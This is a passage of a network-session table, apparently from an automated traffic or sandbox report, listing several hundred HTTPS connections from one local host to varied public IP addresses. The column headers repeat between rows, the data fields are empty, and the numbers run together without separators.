                                                13045192.168.2.23591744.165.7.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13046192.168.2.2357766126.238.229.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13047192.168.2.2358942179.2.102.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13048192.168.2.235139435.9.4.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13049192.168.2.2343004126.59.9.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13050192.168.2.2352350195.191.95.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13051192.168.2.234881281.189.236.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13052192.168.2.2348976173.101.96.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13053192.168.2.2339750131.52.27.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13054192.168.2.2355822118.35.242.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13055192.168.2.2357446183.226.216.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13056192.168.2.2353006163.212.195.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13057192.168.2.2350312218.15.18.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13058192.168.2.2343050182.30.62.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13059192.168.2.2358290158.146.154.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13060192.168.2.2346544204.71.20.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13061192.168.2.233466474.157.254.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13062192.168.2.2357220172.40.102.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13063192.168.2.2357950180.2.48.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13064192.168.2.235163653.239.235.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13065192.168.2.233963485.208.91.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13066192.168.2.2339832104.27.169.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13067192.168.2.2355918169.243.122.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13068192.168.2.234204087.66.1.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13069192.168.2.2333676131.117.223.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13070192.168.2.2356804129.71.155.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13071192.168.2.235169485.204.151.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13072192.168.2.2335464117.136.163.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13073192.168.2.2355640150.160.214.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13074192.168.2.2353790152.70.43.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13075192.168.2.2347658133.202.156.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13076192.168.2.2336888207.4.14.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13077192.168.2.2353282177.192.98.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13078192.168.2.2336282178.128.190.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13079192.168.2.2348286169.23.170.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13080192.168.2.2358828132.55.110.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13081192.168.2.2342626201.50.27.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13082192.168.2.233879453.158.42.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13083192.168.2.234643027.32.120.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13084192.168.2.2353962163.83.242.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13085192.168.2.236067019.19.31.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13086192.168.2.2340040210.187.247.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13087192.168.2.2357454119.124.211.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13088192.168.2.2357432138.116.173.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13089192.168.2.235893471.98.110.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13090192.168.2.235325066.143.246.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13091192.168.2.2350790134.41.123.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13092192.168.2.2355392100.143.198.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13093192.168.2.2332968220.190.31.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13094192.168.2.234687466.183.112.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13095192.168.2.235233069.36.84.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13096192.168.2.2334774184.253.129.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13097192.168.2.233877059.244.199.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13098192.168.2.2333388205.83.96.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13099192.168.2.234399814.192.18.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13100192.168.2.2335780119.116.138.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13101192.168.2.2343322208.183.52.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13102192.168.2.233649283.70.147.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13103192.168.2.2345196154.210.41.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13104192.168.2.2352532126.230.81.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13105192.168.2.2335580201.250.254.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13106192.168.2.2356556121.174.57.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13107192.168.2.2351084156.104.30.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13108192.168.2.234323699.154.169.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13109192.168.2.233625236.95.207.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13110192.168.2.234632439.175.199.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13111192.168.2.2353260195.140.116.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13112192.168.2.2357222212.71.102.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13113192.168.2.2339118121.125.25.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13114192.168.2.2345864107.218.47.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13115192.168.2.233850881.107.90.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13116192.168.2.2350160217.152.179.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13117192.168.2.2348170138.61.141.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13118192.168.2.2350990201.194.132.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13119192.168.2.2346460130.12.141.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13120192.168.2.2356888138.234.142.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13121192.168.2.2336338196.29.216.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13122192.168.2.2336678183.44.125.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13123192.168.2.234418272.127.107.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13124192.168.2.2344438183.59.134.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13125192.168.2.2346310203.20.159.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13126192.168.2.234452697.167.174.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13127192.168.2.2350696112.234.113.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13128192.168.2.2351038101.199.36.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13129192.168.2.2345174118.95.147.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13130192.168.2.2354380192.10.218.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13131192.168.2.2338660171.63.132.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13132192.168.2.234009651.244.9.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13133192.168.2.235684827.61.186.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13134192.168.2.2340760223.12.108.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13135192.168.2.2358586144.158.78.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13136192.168.2.2354684161.22.220.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13137192.168.2.23407121.40.196.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13138192.168.2.2337906100.132.218.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13139192.168.2.2346660221.107.195.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13140192.168.2.2345278125.61.193.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13141192.168.2.234751625.23.217.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13142192.168.2.2343768111.190.241.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13143192.168.2.2336140128.10.124.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13144192.168.2.2341466145.0.33.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13145192.168.2.234779847.34.192.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13146192.168.2.2353452192.56.45.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13147192.168.2.233488466.228.43.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13148192.168.2.23327909.138.21.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13149192.168.2.2359804171.44.53.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13150192.168.2.2348804138.148.132.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13151192.168.2.2359410202.178.160.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13152192.168.2.235006849.113.29.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13153192.168.2.2356556111.84.5.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13154192.168.2.2344504178.148.129.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13155192.168.2.23567268.65.246.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13156192.168.2.235427025.218.68.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13157192.168.2.235454891.220.147.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13158192.168.2.2360932151.11.83.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13159192.168.2.2354972116.1.214.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13160192.168.2.234184272.21.36.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13161192.168.2.236062417.143.28.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13162192.168.2.234354652.148.251.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13163192.168.2.234163077.198.129.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13164192.168.2.2352070173.183.197.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13165192.168.2.2351938108.183.237.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13166192.168.2.2343758132.68.222.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13167192.168.2.234754876.158.218.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13168192.168.2.235664034.206.25.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13169192.168.2.235795024.30.116.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13170192.168.2.235378888.247.163.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13171192.168.2.2339242222.77.229.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13172192.168.2.2360984206.18.27.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13173192.168.2.233949269.191.112.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13174192.168.2.2356418178.111.85.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13175192.168.2.2351728190.104.180.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13176192.168.2.2334940123.207.238.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13177192.168.2.2344726115.252.198.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13178192.168.2.2343026200.100.230.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13179192.168.2.235434025.195.192.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13180192.168.2.233772490.167.156.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13181192.168.2.2341796199.100.189.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13182192.168.2.235703085.200.141.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13183192.168.2.2337766205.237.136.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13184192.168.2.235707893.248.49.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13185192.168.2.234524667.117.94.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13186192.168.2.235631487.100.249.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13187192.168.2.234748877.46.250.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13188192.168.2.234595625.128.139.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13189192.168.2.2343460188.43.143.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13190192.168.2.23412162.208.22.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13191192.168.2.2347994124.20.199.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13192192.168.2.235009876.190.163.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13193192.168.2.2335072172.190.77.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13194192.168.2.2333208116.82.167.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13195192.168.2.2341540152.236.232.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13196192.168.2.23459345.129.205.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13197192.168.2.2360956179.202.230.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13198192.168.2.2353164180.27.46.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13199192.168.2.2357930129.191.171.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13200192.168.2.234848686.112.41.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13201192.168.2.2344898186.193.227.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13202192.168.2.2346798182.45.92.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13203192.168.2.2348310112.169.155.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13204192.168.2.2358426149.235.32.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13205192.168.2.2335046140.250.81.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13206192.168.2.2342672205.32.96.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13207192.168.2.2357210194.83.143.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13208192.168.2.2351842186.3.34.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13209192.168.2.2334380204.154.225.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13210192.168.2.2345724180.238.219.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13211192.168.2.233334457.225.79.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13212192.168.2.2349282183.254.171.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13213192.168.2.234966876.77.198.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13214192.168.2.235161858.126.249.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13215192.168.2.235679679.160.166.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13216192.168.2.2345558163.101.50.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13217192.168.2.2356540158.55.16.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13218192.168.2.2348178194.225.86.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13219192.168.2.2335828155.177.197.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13220192.168.2.2355416119.250.163.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13221192.168.2.2342402122.220.157.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13222192.168.2.2344302197.205.121.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13223192.168.2.234237635.63.235.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13224192.168.2.2354782186.94.44.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13225192.168.2.2343154218.121.153.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13226192.168.2.2338946183.9.7.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13227192.168.2.2358850103.221.130.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13228192.168.2.234667686.115.222.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13229192.168.2.2336318101.165.37.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13230192.168.2.2343890189.223.136.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13231192.168.2.234082298.54.192.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13232192.168.2.2338824212.130.131.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13233192.168.2.2357652157.186.141.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13234192.168.2.2352564191.183.116.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13235192.168.2.234909072.11.147.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13236192.168.2.2340814207.139.60.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13237192.168.2.2357232112.169.193.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13238192.168.2.2345106159.35.24.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13239192.168.2.2356014137.157.236.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13240192.168.2.2353490120.7.215.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13241192.168.2.2335954177.44.136.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13242192.168.2.2335992147.120.187.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13243192.168.2.235188692.232.152.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13244192.168.2.235043238.17.170.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13245192.168.2.2347870218.47.146.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13246192.168.2.2348920192.3.43.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13247192.168.2.23432945.36.195.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13248192.168.2.2335364117.68.67.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13249192.168.2.2346408218.199.82.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13250192.168.2.233924457.167.187.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13251192.168.2.23387445.23.69.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13252192.168.2.235726076.147.40.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13253192.168.2.2346804193.85.90.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13254192.168.2.23356189.64.230.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13255192.168.2.2353700207.228.101.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13256192.168.2.2335296169.166.118.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13257192.168.2.235186265.179.215.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13258192.168.2.2336028149.118.149.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13259192.168.2.2338530139.97.146.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13260192.168.2.235445871.97.14.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13261192.168.2.2346576112.131.15.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13262192.168.2.234140020.90.72.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13263192.168.2.233981227.93.11.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13264192.168.2.2359452103.160.79.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13265192.168.2.2347330125.165.18.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13266192.168.2.233331270.230.218.51443
                                                TimestampBytes transferredDirectionData


